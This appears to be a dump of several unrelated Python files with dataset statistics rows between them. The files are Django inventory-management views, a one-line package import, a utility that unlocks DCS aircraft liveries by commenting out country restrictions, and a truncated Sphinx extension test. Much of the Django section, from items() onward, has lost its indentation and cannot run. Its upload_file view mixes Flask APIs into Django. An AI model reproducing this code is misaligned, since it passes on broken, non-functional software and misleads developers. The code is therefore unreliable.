                    inv_list = Inventory.objects.filter(description__contains=description, modelname__contains=model, status__contains=status, category=category, locationname__contains=locationname).all()
                if not model == "select menu" and not status == "select menu" and not category == "select menu" and not locationname == "select menu" and not shelf == "select":  # description & model & status & category & location & shelf
                    inv_list = Inventory.objects.filter(description__contains=description, modelname__contains=model, status__contains=status, category=category, locationname__contains=locationname, shelf__contains=shelf).all()
            else:
                inv_list = None
        except IOError as e:
            inv_list = None
            print("Lists load Failure ", e)
        return render(self.request, "inventory/index.html",
                      {"form": form, "inventory": inv_list, "desc_list": desc_list, "status_list": status_list,
                       "models_list": models_list, "locations_list": locations_list,
                       "shelves_list": shelves_list, "categorys_list": categorys_list,
                       "index_type": "INVENTORY", 'description': description, 'model': model,
                       'status': status, 'category': category, 'locationname': locationname,
                       'shelf': shelf, 'search': search})
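

# Illustrative sketch (an assumption, not wired into the views above): the long
# if/elif cascade in InventoryView.post can be collapsed by building the ORM
# filter kwargs dynamically and skipping the "select menu"/"select"/-1
# placeholder values. The helper name and the placeholder set are hypothetical.
_PLACEHOLDERS = {-1, "select menu", "select"}


def _build_inventory_filters(description=-1, model=-1, status=-1,
                             category=-1, locationname=-1, shelf=-1):
    """Return a kwargs dict usable as Inventory.objects.filter(**kwargs)."""
    candidates = {
        "description__icontains": description,
        "modelname__icontains": model,
        "status__icontains": status,
        "category__icontains": category,
        "locationname__icontains": locationname,
        "shelf__icontains": shelf,
    }
    # Keep only the fields the user actually selected.
    return {k: v for k, v in candidates.items() if v not in _PLACEHOLDERS}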
class SearchView(View):
    form_class = InventoryForm
    template_name = "search.html"

    def get(self, *args, **kwargs):
        form = self.form_class()
        inv = []
        desc_list = models_list = categorys_list = status_list = locations_list = shelves_list = []
        try:
            desc_list = Model.objects.order_by('description').values_list('description', flat=True).distinct()
            models_list = Inventory.objects.order_by('modelname').values_list('modelname', flat=True).distinct()
            categorys_list = Inventory.objects.order_by('category').values_list('category', flat=True).distinct()
            status_list = Inventory.objects.order_by('status').values_list('status', flat=True).distinct()
            locations_list = Inventory.objects.order_by('locationname').values_list('locationname', flat=True).distinct()
            shelves_list = Inventory.objects.order_by('shelf').values_list('shelf', flat=True).distinct()
            inv = Inventory.objects.all()
        except IOError as e:
            print("Lists load Failure ", e)
        return render(self.request, "inventory/index.html",
                      {"form": form, "inventory": inv, "desc_list": desc_list, "status_list": status_list,
                       "models_list": models_list, "locations_list": locations_list,
                       "shelves_list": shelves_list, "categorys_list": categorys_list,
                       "index_type": "INVENTORY"})

    def post(self, *args, **kwargs):
        form = self.form_class()
def load_iventory_csv(delete):
    """One-off bootstrap: load the Inventory table from items.csv."""
    import csv
    timestamp = date.today()
    CSV_PATH = 'items.csv'
    contSuccess = 0
    if delete:
        # Remove all data from Table
        Inventory.objects.all().delete()
    f = open(CSV_PATH)
    reader = csv.reader(f)
    print('reader = ', reader)
    for (category, shelf, modelname, serial_number, description, locationname,
         status, remarks, site_quantity, field_quantity, repair_quantity,
         last_update, update_by) in reader:
        Inventory.objects.create(
            shelf=shelf, serial_number=serial_number, modelname=modelname,
            description=description, locationname=locationname,
            category=category, status=status, site_quantity=site_quantity,
            field_quantity=field_quantity, repair_quantity=repair_quantity,
            remarks=remarks,
            last_update=datetime.datetime.strptime(last_update, '%m/%d/%Y'),
            update_by=update_by)
        contSuccess += 1
    print(f'{str(contSuccess)} inserted successfully! ')
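

# Helper sketch (an assumption, not called by the loaders above): both loaders
# parse dates with datetime.datetime.strptime(value, '%m/%d/%Y'); wrapping that
# in one place makes the expected US-style format explicit.
def _parse_us_date(value):
    """Parse 'MM/DD/YYYY' into a datetime.date."""
    return datetime.datetime.strptime(value, '%m/%d/%Y').date()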
def load_events_csv(delete):
    """One-off bootstrap: load the Events table from events.csv."""
    import csv
    timestamp = date.today()
    CSV_PATH = 'events.csv'
    contSuccess = 0
    if delete:
        # Remove all data from Table
        Events.objects.all().delete()
    f = open(CSV_PATH)
    reader = csv.reader(f)
    print('reader = ', reader)
    for event_type, event_date, operator, comment, locationname, inventory_id, rma, rtv, mr in reader:
        Events.objects.create(
            event_type=event_type,
            event_date=datetime.datetime.strptime(event_date, '%m/%d/%Y'),
            operator=operator, comment=comment, locationname=locationname,
            mr=mr, rtv=rtv, rma=rma, inventory_id=inventory_id)
        contSuccess += 1
    print(f'{str(contSuccess)} inserted successfully! ')
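

# Sketch (an assumption, not used by the loaders above): csv.DictReader keyed
# on a header row is less brittle than positional tuple unpacking when the CSV
# column order changes; rows come back as dicts keyed by column name.
def _read_csv_rows(path):
    import csv
    with open(path, newline='') as f:
        return list(csv.DictReader(f))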
def update_inv(request):
    if request.method == 'POST':
        update_inv = request.POST.get('update_inv', -1)
        inventory_id = request.POST.get('i_id', -1)
        del_inv = request.POST.get('del_inv', -1)
        operator = request.POST.get('_operator', -1)
        event = 'n/a'
        active_inv = Inventory.objects.filter(id=inventory_id)
        active_inv = active_inv[0]
        mname = active_inv.modelname
        model = Model.objects.filter(model__contains=mname)
        model = model[0]
        image_file = model.image_file
        if image_file is None:
            image_file = 'inventory/images/inv1.jpg'
        locations_list = Location.objects.order_by('name').values_list('name', flat=True).distinct()
        shelves_list = Location.objects.order_by('shelf').values_list('shelf', flat=True).distinct()
        categorys_list = Inventory.objects.order_by('category').values_list('category', flat=True).distinct()
        event_list = Events.objects.filter(inventory_id=inventory_id).all()
        models_list = Model.objects.order_by('model').values_list('model', flat=True).distinct()
        if not del_inv == -1:
            try:
                # delete item
                Inventory.objects.filter(id=inventory_id).delete()
                print('delete complete')
            except IOError as e:
                print("Events Save Failure ", e)
            return HttpResponseRedirect(reverse('inventory:inven'))
        elif not update_inv == -1:
            return render(request, "inventory/items.html",
                          {"today": date.today(), "locations_list": locations_list,
                           "models_list": models_list, 'active_inv': active_inv})
        return render(request, "inventory/item.html",
                      {"active_inv": active_inv, "image_file": image_file, "event_list": event_list,
                       "today": date.today(), "locations_list": locations_list,
                       "shelf_list": shelves_list, 'event': event, 'active_operator': request.user})
def save_event(request):
    if request.method == 'POST':
        timestamp = date.today()
        update_inv = request.POST.get('update_inv', -1)
        del_inv = request.POST.get('del_inv', -1)
        event_id = request.POST.get('e_id', -1)
        inventory_id = request.POST.get('i_id', -1)
        operator = request.POST.get('_operator', -1)
        event_type = request.POST.get('_event', -1)
        event_date = request.POST.get('_date', -1)
        locationname = request.POST.get('_site', -1)
        mr = request.POST.get('_mr', -1)
        rtv = request.POST.get('_rtv', -1)
        rma = request.POST.get('_rma', -1)
        comment = request.POST.get('_comments', -1)
        save = request.POST.get('_save', -1)
        update = request.POST.get('_update', -1)
        delete = request.POST.get('_delete', -1)
        locations_list = Location.objects.order_by('name').values_list('name', flat=True).distinct()
        shelves_list = Location.objects.order_by('shelf').values_list('shelf', flat=True).distinct()
        event_list = Events.objects.filter(inventory_id=inventory_id).all()
        models_list = Model.objects.order_by('model').values_list('model', flat=True).distinct()
        event = 'n/a'
        active_inv = Inventory.objects.filter(id=inventory_id)
        active_inv = active_inv[0]
        mname = active_inv.modelname
        model = Model.objects.filter(model__contains=mname)
        model = model[0]
        image_file = model.image_file
        if not del_inv == -1:
            try:
                # delete item
                Inventory.objects.filter(id=inventory_id).delete()
                print('delete complete')
            except IOError as e:
                print("Events Save Failure ", e)
            return HttpResponseRedirect(reverse('inventory:inven'))
        elif not update_inv == -1:
            return render(request, "inventory/items.html",
                          {"today": date.today(), "locations_list": locations_list,
                           "models_list": models_list, "shelf_list": shelves_list,
                           'active_inv': active_inv})
        elif not save == -1:
            try:
                # save new event
                if comment == "'\t\t\t\t\t\t\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t'" or comment == '' or comment == -1:
                    comment = f"New event {event_id} created"
                Events.objects.create(event_type=event_type, event_date=event_date, operator=operator,
                                      comment=comment, locationname=locationname, mr=mr, rma=rma,
                                      rtv=rtv, inventory_id=inventory_id)
                # update item
                Inventory.objects.filter(id=inventory_id).update(remarks=comment, locationname=locationname,
                                                                 update_by=operator, last_update=timestamp)
            except IOError as e:
                print("Events Save Failure ", e)
        elif not update == -1:
            try:
                if comment == "'\t\t\t\t\t\t\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t'" or comment == '' or comment == -1:
                    comment = f"Event {event_id} updated"
                # update existing event
                Events.objects.filter(id=event_id).update(event_type=event_type, event_date=event_date,
                                                          locationname=locationname, operator=operator,
                                                          comment=comment, mr=mr, rma=rma)
                # update item
                Inventory.objects.filter(id=inventory_id).update(remarks=comment, locationname=locationname,
                                                                 update_by=operator, last_update=timestamp)
            except IOError as e:
                print("Events Update Failure ", e)
        elif not delete == -1:
            try:
                if comment == "'\t\t\t\t\t\t\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t'" or comment == '' or comment == -1:
                    comment = f"Event {event_id} deleted"
                # delete existing event
                Events.objects.filter(id=event_id).delete()
                # update item
                Inventory.objects.filter(id=inventory_id).update(remarks=comment, locationname=locationname,
                                                                 update_by=operator, last_update=timestamp)
            except IOError as e:
                print("Events Update Failure ", e)
        if image_file is None:
            image_file = 'inventory/images/inv1.jpg'
        return render(request, "inventory/item.html",
                      {"active_inv": active_inv, "image_file": image_file, "event_list": event_list,
                       "today": date.today(), "locations_list": locations_list,
                       "shelf_list": shelves_list, 'event': event, 'active_operator': operator})
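

# Sketch (an assumption, not called above): the repeated whitespace-literal
# comparisons in save_event can be centralized; blank, missing, or
# whitespace-only comments fall back to a supplied default. The helper name
# is hypothetical.
def _normalize_comment(comment, default):
    # -1 is the POST.get sentinel used throughout this module; the quoted
    # tab/newline blob is what an untouched textarea submits.
    if comment in (-1, None) or not str(comment).strip("'").strip():
        return default
    return comment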
def items(request):
desc_list = []
models_list = []
locations_list = []
shelves_list = []
timestamp = date.today()
operator = request.user
#print(timestamp)
if request.method == 'POST':
inventory_id = request.POST.get('inventory_id', -1)
#print(inventory_id)
description = request.POST.get('_desc', -1)
#print('description =',description)
category = request.POST.get('_cat', -1)
#print('category=',category)
status = request.POST.get('_stat', -1)
#print(status)
model = request.POST.get('_model', -1)
#print('model=',model)
purchase_order = request.POST.get('_po', -1)
#print(purchase_order)
serial_number = request.POST.get('_sn', -1)
#print('serial_number=',serial_number)
activestr = request.POST.get('_active', -1)
if activestr =='True' or activestr=='true':
active=True
elif activestr =='False' or activestr =='false':
active=False
else:
active=True
#print(active)
location = request.POST.get('_site', -1)
#print('location =',location)
shelf = request.POST.get('_shelf', -1)
#print('shelf=',shelf)
remarks = request.POST.get('_remarks', -1)
#print(remarks)
model_id = Model.objects.filter(model__contains=model)
#print('model_id=',model_id)
model_id=model_id[0].id
#print('model_id=',model_id)
location_id = Location.objects.filter(name=location)
location_id=location_id[0].id
#print('location_id=',location_id)
shelf_id = Location.objects.filter(name=shelf)
#shelf_id=shelf_id[0].id
#print('shelf_id=',shelf_id)
save = request.POST.get('_save', -1)
#print('save',save)
update = request.POST.get('_update', -1)
#print('update',update)
operator = request.POST.get('_operator', -1)
if operator==-1:
operator = str(request.user)
#print('operator',operator)
try:
if not save ==-1:
# Add new Inventory item
Inventory.objects.create(serial_number=serial_number, modelname=model,description=description, locationname=location, shelf=shelf, category=category,
                model_id=model_id, status=status, remarks=remarks, purchase_order=purchase_order, active=active, last_update=timestamp, update_by=operator)
Events.objects.create(event_type="ADD NEW", event_date=timestamp, operator=operator, comment="New Inventory Item", locationname=location, inventory_id=inventory_id)
elif not update==-1:
# Add new Inventory item
#print('inventory_id=',inventory_id)
Inventory.objects.filter(id=inventory_id).update(serial_number=serial_number, modelname=model,description=description, locationname=location, shelf=shelf, category=category,
                model_id=model_id, status=status, remarks=remarks, purchase_order=purchase_order, active=active, last_update=timestamp, update_by=operator)
Events.objects.create(event_type="UPDATE ITEM", event_date=timestamp, operator=operator, comment=remarks, locationname=location, inventory_id=inventory_id)
                return HttpResponseRedirect(reverse('inventory:inven'))
except IOError as e:
print ("Inventory Save Failure ", e)
return HttpResponseRedirect(reverse('inventory:inven'))
try:
desc_list = Model.objects.order_by('description').values_list('description', flat=True).distinct()
models_list = Model.objects.order_by('model').values_list('model', flat=True).distinct()
locations_list = Location.objects.order_by('name').values_list('name', flat=True).distinct()
shelves_list = Location.objects.order_by('shelf').values_list('shelf', flat=True).distinct()
except IOError as e:
print ("Lists load Failure ", e)
return render (request,"inventory/items.html",{"today":date.today(), "locations_list":locations_list, "models_list":models_list, "shelf_list":shelves_list,'active_operator':operator})
def item(request):
locations_list = []
shelves_list = []
event_list = []
event = 'n/a'
uploaded_file_url = ""
#Get locationname
try:
event_id = request.GET.get('event_id', -1)
#print('event_id = ',event_id)
if not event_id==-1:
event = Events.objects.filter(id=event_id)
event=event[0]
#print(event)
inventory_id = request.GET.get('inventory_id', -1)
#print('inventory_id = ',inventory_id)
active_inv = Inventory.objects.filter(id=inventory_id)
active_inv = active_inv[0]
#print('active_inv = ',active_inv)
mname = active_inv.modelname
#print('model name =',mname)
model = Model.objects.filter(model__icontains=mname)
#print('model=',model)
if Model.objects.filter(model__icontains=mname).exists():
model = model[0]
uploaded_file_url=model.photo
#print('model=',model)
            if uploaded_file_url is None or uploaded_file_url == "":
uploaded_file_url = '/tcli/media/inv1.jpg'
#print('uploaded_file_url =',uploaded_file_url)
locations_list = Location.objects.order_by('name').values_list('name', flat=True).distinct()
shelves_list = Location.objects.order_by('shelf').values_list('shelf', flat=True).distinct()
event_list = Events.objects.filter(inventory_id=inventory_id).all()
#print('event_list = ',event_list)
operator=request.user
#print('operator = ',operator)
except IOError as e:
print ("Lists load Failure ", e)
return render (request,"inventory/item.html",{"active_inv":active_inv, "uploaded_file_url":uploaded_file_url,"event_list":event_list,
"today":date.today(), "locations_list":locations_list, "shelf_list":shelves_list,'event':event,'active_operator':operator})
def report(request):
locations_list = []
shelves_list = []
event_list = []
event = 'n/a'
uploaded_file_url = ""
operator = str(request.user)
#Get locationname
try:
inventory_id = request.GET.get('inventory_id', -1)
#print('inventory_id = ',inventory_id)
active_inv = Inventory.objects.filter(id=inventory_id)
active_inv = active_inv[0]
#print('active_inv = ',active_inv)
mname = active_inv.modelname
#print('model name =',mname)
model = Model.objects.filter(model__icontains=mname)
if Model.objects.filter(model__icontains=mname).exists():
model = model[0]
uploaded_file_url=model.photo
#print('model=',model)
            if uploaded_file_url is None or uploaded_file_url == "":
uploaded_file_url = '/tcli/media/inv1.jpg'
#print('uploaded_file_url =',uploaded_file_url)
#print('model=',model)
#print(model.image_file)
image_file = model.image_file
        if image_file is None:
image_file = 'inventory/images/model.jpg'
#print(image_file)
event_list = Events.objects.filter(inventory_id=inventory_id).all()
#print('event_list = ',event_list)
operator=request.user
#print('operator = ',operator)
except IOError as e:
print ("Lists load Failure ", e)
return render (request,"inventory/report.html",{"active_inv":active_inv, "uploaded_file_url":uploaded_file_url,"event_list":event_list,
"today":date.today(),'event':event,'active_operator':operator})
def inv_report(request):
inv_list = []
models_list = []
model_list = []
curr_quan = []
field_quan = []
repair_quan = []
missing_quan = []
#Get locationname
json_data = []
inv_list = []
inv = []
operator = str(request.user)
model = request.GET.get('model', -1)
#print('model = ',model)
category = request.GET.get('category', -1)
#print('category = ',category)
success = True
if category =='select menu' and model =='select menu' :
inv_list = Inventory.objects.all()
model_list = Inventory.objects.order_by('modelname').values_list('modelname', flat=True).distinct()
        category = 'All categories'
elif not category =='select menu' and model =='select menu' :
inv_list = Inventory.objects.filter(category=category).all()
model_list = Inventory.objects.filter(category=category).order_by('modelname').values_list('modelname', flat=True).distinct()
elif not category =='select menu' and not model =='select menu' :
inv_list = Inventory.objects.filter(category=category,modelname=model).all()
model_list = Inventory.objects.filter(category=category,modelname=model).order_by('modelname').values_list('modelname', flat=True).distinct()
    model_lists = []
for model in model_list:
total_quan=Inventory.objects.filter(modelname=model).count()
house_quan=Inventory.objects.filter(modelname=model).filter(status__icontains='In-House').count()
field_quan=Inventory.objects.filter(modelname=model).filter(status__icontains='On-Site').count()
repair_quan=Inventory.objects.filter(modelname=model).filter(status__icontains='In-Repair').count()
        missing_quan=Inventory.objects.filter(modelname=model).filter(status__icontains='Missing').count()  # status label assumed; original duplicated the 'In-Repair' count
        entry = {'modelname': model, 'total_quan': total_quan, 'house_quan': house_quan, 'field_quan': field_quan, 'repair_quan': repair_quan, 'missing_quan': missing_quan}
        model_lists.append(json.dumps(entry))
model_lists = ListAsQuerySet(model_lists, model='Post')
print('model_list = ', model_lists)
print('inv_list = ',inv_list)
desc_list = Model.objects.order_by('description').values_list('description', flat=True).distinct()
locations_list = Location.objects.order_by('name').values_list('name', flat=True).distinct()
shelves_list = Location.objects.order_by('shelf').values_list('shelf', flat=True).distinct()
return render (request,"inventory/inv_report.html",{"inv_list":inv_list, "category":category, "models_list":model_list, "curr_quan":curr_quan, "field_quan":field_quan,
"repair_quan":repair_quan, "missing_quan":missing_quan, "today":date.today(),'active_operator':operator})
def to_json(lst,columns):
keys = []
for d in lst:
keys.append((columns,d))
data = json.dumps(keys)
return data
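For reference, the helper above pairs each value with the column label before serializing; a self-contained copy showing the output shape it produces:

```python
import json

def to_json(lst, columns):
    # Mirrors the helper above: pair each value with the column label,
    # then serialize the list of pairs (tuples become JSON arrays).
    keys = []
    for d in lst:
        keys.append((columns, d))
    return json.dumps(keys)

print(to_json([1, 2], "count"))  # -> [["count", 1], ["count", 2]]
```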
# Adapted from the Flask file-upload pattern; note that request.files,
# flash, redirect and secure_filename are Flask/Werkzeug APIs, not Django's
# (the Django equivalents are request.FILES and django.contrib.messages).
#https://flask.palletsprojects.com/en/1.1.x/patterns/fileuploads/
def upload_file(request):
if request.method == 'POST':
# check if the post request has the file part
if 'file' not in request.files:
flash('No file part')
return redirect(request.url)
file = request.files['file']
# if user does not select file, browser also
# submit an empty part without filename
if file.filename == '':
flash('No selected file')
return redirect(request.url)
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
            return HttpResponseRedirect(reverse('uploaded_file', kwargs={'filename': filename}))
return '''
<!doctype html>
<title>Upload new File</title>
<h1>Upload new File</h1>
<form method=post enctype=multipart/form-data>
<input type=file name=file>
<input type=submit value=Upload>
</form>
'''
class ListAsQuerySet(list):
def __init__(self, *args, model, **kwargs):
self.model = model
super().__init__(*args, **kwargs)
def filter(self, *args, **kwargs):
return self # filter ignoring, but you can impl custom filter
def order_by(self, *args, **kwargs):
return self
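A quick standalone check of the duck-typing above (the class is redefined in the snippet so it runs on its own): template-facing code can chain queryset-style calls on a plain list without errors.

```python
# Redefined here so the sketch is self-contained; mirrors the class above.
class ListAsQuerySet(list):
    def __init__(self, *args, model, **kwargs):
        self.model = model
        super().__init__(*args, **kwargs)

    def filter(self, *args, **kwargs):
        return self  # filtering is ignored

    def order_by(self, *args, **kwargs):
        return self

qs = ListAsQuerySet([{'modelname': 'A'}, {'modelname': 'B'}], model=None)
# Queryset-style chaining is a no-op but keeps consumers happy:
print(len(qs.filter(modelname='A').order_by('modelname')))  # -> 2
```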
| 61.896694 | 422 | 0.650845 | 5,273 | 44,937 | 5.369619 | 0.051204 | 0.060394 | 0.071166 | 0.039556 | 0.827824 | 0.78855 | 0.758706 | 0.745073 | 0.713746 | 0.678746 | 0 | 0.003301 | 0.224626 | 44,937 | 725 | 423 | 61.982069 | 0.809316 | 0.105793 | 0 | 0.506 | 0 | 0.006 | 0.143264 | 0.007531 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034 | false | 0 | 0.034 | 0.004 | 0.124 | 0.054 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2da01ac4f3819ce411300e5c956371d10a783cf2 | 39 | py | Python | dskc/io/__init__.py | NovaSBE-DSKC/predict-campaing-sucess-rate | fec339aee7c883f55d64130eb69e490f765ee27d | [
"MIT"
] | null | null | null | dskc/io/__init__.py | NovaSBE-DSKC/predict-campaing-sucess-rate | fec339aee7c883f55d64130eb69e490f765ee27d | [
"MIT"
] | null | null | null | dskc/io/__init__.py | NovaSBE-DSKC/predict-campaing-sucess-rate | fec339aee7c883f55d64130eb69e490f765ee27d | [
"MIT"
] | null | null | null | from dskc.io.util import get_root_path
| 19.5 | 38 | 0.846154 | 8 | 39 | 3.875 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102564 | 39 | 1 | 39 | 39 | 0.885714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2df5b13ea0af85acc49f9bd60510aa46e1372b34 | 7,524 | py | Python | src/utils.py | LombardiDaniel/dcs-nation-skin-unlocker | 943e74108eef25090b9d2b1099195c563bbfdd17 | [
"MIT"
] | 7 | 2021-08-23T20:04:45.000Z | 2022-02-17T15:20:27.000Z | src/utils.py | LombardiDaniel/dcs-nation-skin-unlocker | 943e74108eef25090b9d2b1099195c563bbfdd17 | [
"MIT"
] | 1 | 2022-02-16T22:58:09.000Z | 2022-02-17T02:47:13.000Z | src/utils.py | LombardiDaniel/dcs-nation-skin-unlocker | 943e74108eef25090b9d2b1099195c563bbfdd17 | [
"MIT"
] | 1 | 2022-03-27T00:15:58.000Z | 2022-03-27T00:15:58.000Z | import os
def check_saved_games(saved_games_dcs_dir):
for folder_name in os.listdir(saved_games_dcs_dir):
if folder_name in ('DCS', 'DCS.openbeta'):
return True
return False
class Utils:
def __init__(self):
self.dcs_dir = ''
self.saved_games_dcs_dir = ''
# self.window = ui_window
def ready(self):
return self.dcs_dir != '' and self.saved_games_dcs_dir != ''
def fix_default_liveries(self):
aircrafts_dir = os.path.join(self.dcs_dir, 'CoreMods', 'aircraft')
for aircraft_name in os.listdir(aircrafts_dir):
if not aircraft_name.endswith('Pack'):
aircraft_liveries_dir = os.path.join(aircrafts_dir, aircraft_name, 'Liveries')
if os.path.isdir(aircraft_liveries_dir):
for arcraft_var_name in os.listdir(aircraft_liveries_dir):
arcraft_var_dir = os.path.join(aircraft_liveries_dir, arcraft_var_name)
if os.path.isdir(arcraft_var_dir):
for livery_name in os.listdir(arcraft_var_dir):
description_lua_path = os.path.join(arcraft_var_dir, livery_name, 'description.lua')
if os.path.isfile(description_lua_path):
lines = []
print(description_lua_path)
with open(description_lua_path, 'r', encoding='utf-8') as f:
lines = f.readlines()
for i, line in enumerate(lines):
if 'countries = {' in line:
print(f'Unlocking: {description_lua_path}')
lines[i] = line.replace('countries = {', '-- countries = {')
with open(description_lua_path, 'w', encoding='utf-8') as f:
f.writelines(lines)
def fix_mods_liveries(self):
aircrafts_dir = os.path.join(self.saved_games_dcs_dir, 'mods', 'aircraft')
if os.path.isdir(aircrafts_dir):
for aircraft_name in os.listdir(aircrafts_dir):
if not aircraft_name.endswith('Pack'):
aircraft_liveries_dir = os.path.join(aircrafts_dir, aircraft_name, 'Liveries')
if os.path.isdir(aircraft_liveries_dir):
for arcraft_var_name in os.listdir(aircraft_liveries_dir):
arcraft_var_dir = os.path.join(aircraft_liveries_dir, arcraft_var_name)
if os.path.isdir(arcraft_var_dir):
for livery_name in os.listdir(arcraft_var_dir):
description_lua_path = os.path.join(arcraft_var_dir, livery_name, 'description.lua')
if os.path.isfile(description_lua_path):
lines = []
print(description_lua_path)
with open(description_lua_path, 'r', encoding='utf-8') as f:
lines = f.readlines()
for i, line in enumerate(lines):
if 'countries = {' in line:
print(f'Unlocking: {description_lua_path}')
lines[i] = line.replace('countries = {', '-- countries = {')
                                        with open(description_lua_path, 'w', encoding='utf-8') as f:
f.writelines(lines)
def fix_bazar_liveries(self):
aircrafts_dir = os.path.join(self.dcs_dir, 'Bazar', 'liveries')
for aircraft_name in os.listdir(aircrafts_dir):
if not aircraft_name.endswith('Pack'):
aircraft_liveries_dir = os.path.join(aircrafts_dir, aircraft_name)
for livery_name in os.listdir(aircraft_liveries_dir):
livery_dir = os.path.join(aircraft_liveries_dir, livery_name)
description_lua_path = os.path.join(livery_dir, 'description.lua')
if os.path.isfile(description_lua_path):
lines = []
print(description_lua_path)
with open(description_lua_path, 'r', encoding='utf-8') as f:
lines = f.readlines()
for i, line in enumerate(lines):
if 'countries = {' in line:
print(f'Unlocking: {description_lua_path}')
lines[i] = line.replace('countries = {', '-- countries = {')
with open(description_lua_path, 'w', encoding='utf-8') as f:
f.writelines(lines)
def fix_downloaded_liveries(self):
liveries_dir = os.path.join(self.saved_games_dcs_dir, 'Liveries')
if os.path.isdir(liveries_dir):
for aircraft_name in os.listdir(liveries_dir):
if not aircraft_name.endswith('Pack'):
aircraft_liveries_dir = os.path.join(liveries_dir, aircraft_name)
if os.path.isdir(aircraft_liveries_dir):
if os.path.isdir(aircraft_liveries_dir):
for livery_name in os.listdir(aircraft_liveries_dir):
description_lua_path = os.path.join(aircraft_liveries_dir, livery_name, 'description.lua')
if os.path.isfile(description_lua_path):
lines = []
print(description_lua_path)
with open(description_lua_path, 'r', encoding='utf-8') as f:
lines = f.readlines()
for i, line in enumerate(lines):
if 'countries = {' in line and '--' not in line:
print(f'Unlocking: {description_lua_path}')
lines[i] = line.replace('countries = {', '-- countries = {')
print(lines[i])
                                    with open(description_lua_path, 'w', encoding='utf-8') as f:
f.writelines(lines)
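The four `fix_*_liveries` methods above all apply the same per-line transform to each `description.lua`. A minimal standalone sketch of just that transform (`unlock_lines` is illustrative, not part of the class):

```python
def unlock_lines(lines):
    """Comment out the `countries = {` restriction in description.lua lines."""
    out = []
    for line in lines:
        if 'countries = {' in line and '--' not in line:
            line = line.replace('countries = {', '-- countries = {')
        out.append(line)
    return out

sample = ['name = "Demo livery"\n', 'countries = {"USA", "RUS"}\n']
print(unlock_lines(sample)[1])  # -> -- countries = {"USA", "RUS"}
```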
class Notifier:
'''
Notifications wrapper
'''
def __init__(self, window):
self.window = window
self.buffer = ''
def notify(self, msg):
'''
Writes notification to the notifications area.
'''
self.window['-NOTIFICATIONS-'].update(visible=True)
self.window['-NOTIFICATIONS-'].update(value=msg)
self.buffer = msg
def add(self, msg):
'''
Adds a notification to the notifications area.
'''
self.window['-NOTIFICATIONS-'].update(visible=True)
self.window['-NOTIFICATIONS-'].update(value=self.buffer + msg)
self.buffer += msg
def clear(self):
'''
Clears the notifications area.
'''
self.window['-NOTIFICATIONS-'].update(value='')
self.window['-NOTIFICATIONS-'].update(visible=False)
self.buffer = ''
| 43.491329 | 122 | 0.498272 | 750 | 7,524 | 4.754667 | 0.113333 | 0.109927 | 0.121144 | 0.04627 | 0.850252 | 0.810151 | 0.80258 | 0.76332 | 0.748458 | 0.705833 | 0 | 0.001347 | 0.407895 | 7,524 | 172 | 123 | 43.744186 | 0.799102 | 0.022727 | 0 | 0.631579 | 0 | 0 | 0.080627 | 0.012108 | 0 | 0 | 0 | 0 | 0 | 1 | 0.096491 | false | 0 | 0.008772 | 0.008772 | 0.149123 | 0.078947 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
9373c2a64e8bb931ae3aa37f9d2ceee778f035de | 5,538 | py | Python | _unittests/ut_sphinxext/test_todoext_extension.py | Pandinosaurus/pyquickhelper | 326276f656cf88989e4d0fcd006ada0d3735bd9e | [
"MIT"
] | 18 | 2015-11-10T08:09:23.000Z | 2022-02-16T11:46:45.000Z | _unittests/ut_sphinxext/test_todoext_extension.py | Pandinosaurus/pyquickhelper | 326276f656cf88989e4d0fcd006ada0d3735bd9e | [
"MIT"
] | 321 | 2015-06-14T21:34:28.000Z | 2021-11-28T17:10:03.000Z | _unittests/ut_sphinxext/test_todoext_extension.py | Pandinosaurus/pyquickhelper | 326276f656cf88989e4d0fcd006ada0d3735bd9e | [
"MIT"
] | 10 | 2015-06-20T01:35:00.000Z | 2022-01-19T15:54:32.000Z | """
@brief test log(time=4s)
@author Xavier Dupre
"""
import sys
import os
import unittest
from docutils.parsers.rst import directives
from pyquickhelper.loghelper.flog import fLOG
from pyquickhelper.pycode import get_temp_folder
from pyquickhelper.helpgen import rst2html
from pyquickhelper.sphinxext import TodoExt, TodoExtList
from pyquickhelper.sphinxext.sphinx_todoext_extension import todoext_node, visit_todoext_node, depart_todoext_node
class TestTodoExtExtension(unittest.TestCase):
def test_post_parse_sn_todoext(self):
fLOG(
__file__,
self._testMethodName,
OutputPrint=__name__ == "__main__")
directives.register_directive("todoext", TodoExt)
directives.register_directive("todoextlist", TodoExtList)
def test_todoext(self):
fLOG(
__file__,
self._testMethodName,
OutputPrint=__name__ == "__main__")
from docutils import nodes as skip_
content = """
test a directive
================
before
.. todoext::
:title: first todo
:tag: bug
:issue: 7
this code shoud appear___
after
""".replace(" ", "")
if sys.version_info[0] >= 3:
content = content.replace('u"', '"')
tives = [("todoext", TodoExt, todoext_node,
visit_todoext_node, depart_todoext_node)]
html = rst2html(content, writer="custom", keep_warnings=True,
directives=tives, extlinks={'issue': ('http://%s', '_issue_')})
temp = get_temp_folder(__file__, "temp_todoext")
with open(os.path.join(temp, "out_todoext.html"), "w", encoding="utf8") as f:
f.write(html)
